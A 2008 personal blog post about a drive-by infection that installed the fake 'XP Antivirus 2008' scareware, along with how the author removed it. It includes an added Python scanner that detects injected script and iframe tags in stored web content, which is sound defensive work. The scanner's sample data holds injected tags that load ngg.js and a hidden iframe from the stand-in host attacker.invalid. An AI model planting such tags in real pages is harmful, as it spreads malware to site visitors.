How did I get the XP AntiVirus 2008?
One of the computers in our household picked up a drive-by virus infection recently. This particular infection is one of the well-known backdoor Trojans that arrive by exploiting browser vulnerabilities from a web site that would otherwise seem harmless. The web site in question had already been compromised by a server-side SQL injection exploit, which was replacing its web pages with ones that framed the original content and contained malicious JavaScript.

The computer in question was running Windows XP Service Pack 2, under a non-administrative account, with a 20-day-old Symantec AntiVirus 7.x virus definition list.

Why would anyone bother? In this case, the software that was loaded had all sorts of capabilities: it was malware, spyware, and blackmailware in one blended threat. One piece attempts to open a back door to your computer so that it can be controlled as part of a botnet. A botnet can be used to generate Internet traffic such as denial-of-service attacks and spam email, and to deliver other content. Another malware program downloads further software that pops up and attempts to blackmail you into buying it so that your computer will continue to work.
Here is what happened.
The user of the computer, whose name shall not be used, surfed to a site owned by the National Park Service called livetheriver.org. The infected Apache web server had a text substitution script that was attempting to force browser clients to run a script file called ngg.js. The infected Apache/Linux servers most likely had been hit with SQL injection attacks; web sites that catalog content using a database are susceptible. The infected web servers then help to propagate malware to Windows-based client computers. In this case, our computer's Internet Explorer loaded and ran the script. Once run, a number of pieces of malware were loaded on the PC, including the ASPROX Trojan proxy server, the BraviaX downloader, and the beep.sys rootkit. Once BraviaX started, it loaded the XP Antivirus 2008 software.
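The injection described above worked by rewriting stored page content so that every page the server handed out pulled in a script (ngg.js) from an outside host. The following scanner is an added example, not code from the original post or from any of the tools it mentions: it walks HTML fragments such as rows pulled from a CMS database or files under a web root and flags every script or iframe reference whose host is not on a site-owner allow-list. The host names and sample rows are constructed for the demonstration.

```python
"""Flag script/iframe references injected into stored web content.

Added example (not from the original post). Hostnames and sample rows are
constructed; only the file name ngg.js comes from the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _RefCollector(HTMLParser):
    """Collect the src attribute of every <script> and <iframe> tag."""
    TAGS = {"script", "iframe"}

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (tag, url) tuples

    def handle_starttag(self, tag, attrs):
        if tag in self.TAGS:
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.refs.append((tag, value.strip()))


def external_references(html, trusted_hosts):
    """Return (tag, url, host) for each script/iframe src not on the allow-list.

    Relative URLs resolve to the same origin and are treated as trusted.
    Protocol-relative URLs (//host/path) are resolved to their host, since
    that form is a common way to make an injected tag work over http and https.
    """
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, url in collector.refs:
        host = urlparse(url).netloc.lower()
        if not host:
            continue  # relative URL: same origin as the page itself
        host = host.split(":")[0]  # drop an explicit port before comparing
        if host not in trusted_hosts:
            findings.append((tag, url, host))
    return findings


def scan_rows(rows, trusted_hosts):
    """Scan (row_id, text) pairs, e.g. CMS database rows, and return a dict
    mapping row_id -> list of external references found in that row."""
    report = {}
    for row_id, text in rows:
        hits = external_references(text, trusted_hosts)
        if hits:
            report[row_id] = hits
    return report


# Constructed sample data: four stored page fragments, two of which have been
# rewritten so that the served page loads content from an outside host.
TRUSTED_HOSTS = {"www.example.org", "cdn.example.org"}
SAMPLE_ROWS = [
    (1, '<p>Welcome to the river.</p><script src="/js/site.js"></script>'),
    (2, '<p>Trail map</p><script src="http://attacker.invalid/ngg.js"></script>'),
    (3, '<h2>Events</h2><iframe src="//attacker.invalid/frame.html" '
        'width="0" height="0"></iframe>'),
    (4, '<p>Photos</p><script src="https://cdn.example.org/gallery.js"></script>'),
]

if __name__ == "__main__":
    for row_id, hits in scan_rows(SAMPLE_ROWS, TRUSTED_HOSTS).items():
        for tag, url, host in hits:
            print(f"row {row_id}: <{tag}> loads {url} from untrusted host {host}")
```

Run against a dump of the database's text columns, a scan like this turns up the rewritten rows directly, which is faster than inspecting served pages one at a time; the zero-sized iframe in row 3 is the shape such injections typically take, and the allow-list is what keeps the site's own CDN from being reported.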
Once XP Antivirus 2008 started, it warned that there was a spyware infection and told you to send your credit card information to some company in Ukraine.

The ironic part is that it IS the infection. It reminded me of Syndrome, the antagonist in the movie The Incredibles. Syndrome sends a robot to destroy the city, then appears to fight the robot to save the city.
Fortunately, the good guys are keeping right up with the bad guys. Andy Manchesta has a life-saving program called SDFix.
http://downloads.andymanchesta.com/RemovalTools/SDFix_ReadMe.htm
I ran SDFix to clear the malware. I booted Windows XP in safe mode and copied the program from a CD. With beep.sys loaded, you cannot run the anti-CoolWebSearch tool or HijackThis: the rootkit knows the name of the program and blocks it from starting. Future versions may also prevent SDFix from running, so you may have to rename the program.
Afterwards, I updated the computer to the newly released XP Service Pack 3. I uninstalled Symantec/Norton and installed AVG Anti-Virus Free version 8. I have been using version 7.5 on my Windows Vista system since March 2007. I ran a scan and it found all the suspect files, including the infected web pages in the browser cache. It also found files in the System Volume Information directory. These keep showing up during scans, so I may have to follow up on a way to clear that out.
I also installed Spybot Search & Destroy, which claims to be able to catch these threats. Note that Opera, Safari, Mozilla Firefox and Internet Explorer all have vulnerabilities that have been exploited by this malware group.
More helpful links:

Balloon saying "Your computer is infected with spyware" is most likely malware
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t134064.html

So how did I get infected in the first place?
http://forums.whatthetech.com/So_how_did_I_get_infected_in_the_first_place_t57817.html

How the Medichi rootkit works (also using beep.sys)
http://www.greatis.com/security/medichi_exe_murka_dat_rootkit.htm

More about the System Volume Information directory
http://www.theeldergeek.com/system_volume_information_folder1.htm

More about BraviaX
http://www.cmilner.com/crapware.php

AVG Antivirus
http://www.grisoft.com

Free version 8.0 Antivirus at
http://free.avg.com/

Spybot Search & Destroy
http://www.safer-networking.org
Posted on Thursday, July 03, 2008 @ 11:58:46 UTC by BB